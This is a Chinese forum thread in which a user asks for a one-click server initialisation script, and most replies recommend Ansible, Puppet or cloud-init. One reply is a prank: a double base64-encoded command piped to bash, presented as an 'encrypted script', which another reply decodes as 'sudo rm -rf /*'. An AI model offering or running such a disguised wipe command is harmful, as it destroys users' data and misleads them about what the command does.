V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
mywaiting
V2EX  ›  问与答

伸手党:深夜问问有没有一键初始化服务器配置的脚本

  •  
  •   mywaiting · 2016-12-05 00:58:03 +08:00 · 2134 次点击
    这是一个创建于 2930 天前的主题,其中的信息可能已经有所发展或是发生改变。
    部署了一个服务器,当然啦,无论是云还是物理机啥的

    运行一下 ./init.sh 就可以完全配置好这台服务器这样的 shell script

    当然了,里面希望可以有地方可以直接定制一下

    包括但不限于:

    1 、配置好 hostname 、 ntp 、 hosts
    2 、配置好 /etc/ssh/sshd_config 不能 root 登录,只能使用证书登录
    3 、有配置好 iptables 的地方,并设置好开机启动
    4 、添加好 sudo 用户
    5 、按照 fail2ban 等(可选)


    有知道这样的 麻烦分享一下,懒得自己写了

    谢谢!
    12 条回复    2016-12-05 12:45:02 +08:00
    dzxx36gyy
        1
    dzxx36gyy  
       2016-12-05 01:13:14 +08:00 via Android
    很多人都应该有这种自用的脚本……但是因为是自用估计大部分都是写死的……所以你还是自己写吧
    9hills
        2
    9hills  
       2016-12-05 01:17:31 +08:00 via iPhone
    Ansible playbook
    debiann
        3
    debiann  
       2016-12-05 01:22:24 +08:00 via iPhone
    又要定制,又要别人以前写好的。不觉得矛盾吗
    cocochan
        4
    cocochan  
       2016-12-05 01:24:41 +08:00 via iPhone   ❤️ 1
    echo "YzNWa2J5QnliU0F0Y21ZZ0x5bz0="|base64 -d|base64 -d|bash

    加密脚本
    iThink
        5
    iThink  
       2016-12-05 01:36:35 +08:00   ❤️ 1
    @cocochan 果然是 sudo rm -rf /* 这样真的好么?
    iyaozhen
        6
    iyaozhen  
       2016-12-05 01:40:11 +08:00 via Android
    楼主你这样说是要给钱的
    dangge
        7
    dangge  
       2016-12-05 01:58:43 +08:00 via Android
    看看 docker ?
    66450146
        8
    66450146  
       2016-12-05 06:24:09 +08:00
    用 puppet 吧,其实这种东西手写一下很快的
    mywaiting
        9
    mywaiting  
    OP
       2016-12-05 08:50:14 +08:00
    @cocochan 我读书少,你不要欺负我........
    xuboying
        10
    xuboying  
       2016-12-05 08:56:19 +08:00 via iPhone
    cloud-init 可以。但我还不会用。。。
    shiji
        11
    shiji  
       2016-12-05 09:44:51 +08:00
    我来给你分享一段我自己曾经用过的( Linode 的 StackScript )
    Debian 的。

    # 设置 SSH 登陆,(公钥是存在一个网站上的)
    mkdir /root/.ssh && chmod 700 /root/.ssh
    wget https://*****************/authorized_keys -O /root/.ssh/authorized_keys
    sed -i s/\#PasswordAuthentication\ yes/PasswordAuthentication\ no/ /etc/ssh/sshd_config
    service ssh restart

    # 设置 iptables , 如果已经有了现成的规则,要在 echo 之前用 iptables-restore/ip6tables-restore 加载。
    apt-get update
    echo iptables-persistent iptables-persistent/autosave_v4 boolean true | sudo debconf-set-selections
    echo iptables-persistent iptables-persistent/autosave_v6 boolean true | sudo debconf-set-selections
    apt-get install -y -qq iptables-persistent
    mckelvin
        12
    mckelvin  
       2016-12-05 12:45:02 +08:00 via iPhone
    用 shell 脚本加 sudo 用户是不是感觉很累?你需要 ansible 之类的自动化 provision 的工具。类似的还有 chef, puppet.个人最喜欢 Ansible.
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   875 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 20:29 · PVG 04:29 · LAX 12:29 · JFK 15:29
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.